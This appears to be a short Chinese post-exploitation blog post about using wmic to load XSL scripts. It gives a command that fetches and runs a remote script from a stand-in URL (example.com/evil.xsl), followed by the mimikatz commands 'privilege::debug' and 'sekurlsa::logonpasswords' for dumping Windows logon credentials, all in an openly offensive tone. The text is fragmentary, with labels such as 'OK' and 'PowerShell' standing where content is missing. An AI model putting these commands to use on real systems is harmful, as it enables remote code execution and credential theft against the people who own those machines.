前言

wmic是比cmd强大的命令行。轻量级调试器神器mimikatz,后渗透常用,可以说是您

居家旅行杀人灭口必备良器

测试wmic

使用wmic能够从本地或从URL调用XSL(可扩展样式表语言)脚本。

本地:
wmic process list /FORMAT:evil.xsl
远程:
wmic os get /FORMAT:"https://example.com/evil.xsl"
  • 本地:

privilege::debug
sekurlsa::logonpasswords

密码账号

  • 远程:

OK

PowerShell

项目:地址

升级版Demon表哥演示

总结

emmmm,多关注墙外的知识。

参考(抄袭):

https://www.secpulse.com/archives/71380.html

https://www.t00ls.net/viewthread.php?tid=45774&extra=&page=1